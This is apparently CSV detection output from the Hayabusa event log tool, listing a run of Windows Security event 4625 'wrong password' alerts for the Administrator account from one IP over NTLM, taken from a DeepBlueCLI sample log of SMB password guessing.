2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jhUGOtszbPUwccL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yB8Mzo1RppdpLFKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOwoUlHGVeSbAhuN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BXIEHbkrjwedeaih : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OvsKoixgEzUgAyie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TzaZe6Y4Tdfjseuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEmbuU3CAC3CecZy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kfBmqmVPd0CGVUsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Uz3TlU6yrcveM1w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z6hH6AkkgBFmeZ6u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2J1W2WhA6Pj7j5j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: soHOxnkoOn7ot0My : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4c2oWI6mRIvSVSKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKsXD8aTyaC4fBqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrzji5ucmutsZNpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BApOU105FCLwj4zn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EO50f7NfrrdwwCNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PfTYbWC8IjW87th8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wLnE6zm5US4maK04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AV7taC7hYQdVjAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8MnnaSRs0bnYVlMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YgqavZ1SuNvX7RgH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IQvoIsfW0LhDit2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 33IPGQXc1MarY30J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: II4Ly9LnkWlq60Ux : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wncfJC7kDSI7O9Ud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6XzbWef3PuzQK3FJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M5670HdNC6c8O56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ea8FcddgLyV5o6oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjyhmKFdBNrHIvTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIF47pEWBMp6Nbym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6TO891WvJPkdjsct : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6cLnJYpHEzGAvhWG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gy6cFTrwrpRQFxfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gxz612Z88PMCKzAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GSPC8hibdZdyOcex : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6vlmykLeFmuhn81B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w4lEW9w53zMFPcc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jt2lDRFWwi6adwlB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G9MGvle35u5OGB5o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJgLFM2vrnKuj5N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8HRyDAzwKj9bfnA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J65LcwnRgEob9wjY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhas9e1fwDZ1Fxvt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5qJRSpjS6tZJjNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bo4HAgP2tw0GmZ4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zv0cbLCD7E05i0g5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FIKsQLk5iPyKoeqM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RiHAaBszJBGe2deQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8em4eOiqze683Cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86lXQsnn7dae93tW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Iu8olNGPmhxh6iNu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZYtN5EMHxcNqID6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mtUQGxrMoPkpUQCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYh4e3bpePhDoRwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UkC8E9uKpCgD1BHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZCDxpmDZbpGCey3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SS2dxS3WvCrAyiB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YT3VHxKNf8q14rro : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fx9HQT3u3Ig6vJ3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FukPQsr4SXRshyTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7AutKUyPELNRUcA4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 38gBkWcYdZW6Wcdz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HMKnLRQCDn1CHZdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ShGnRYHfVSuPvfcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LXVWG3Yl0utv98Zf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VDfa0UebgleQMK5U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxTLJJsWs9dOc5JC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7cKtymmsQJSM6zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbtC0srNyvkIHOSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPGlJ6ZjGSfUKrCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Uw95Ema8vWlRXKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hHTrBmhkjGLTNt2R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJeRVGKULJIo76aa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kipf0Z2Tse2eWoxa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
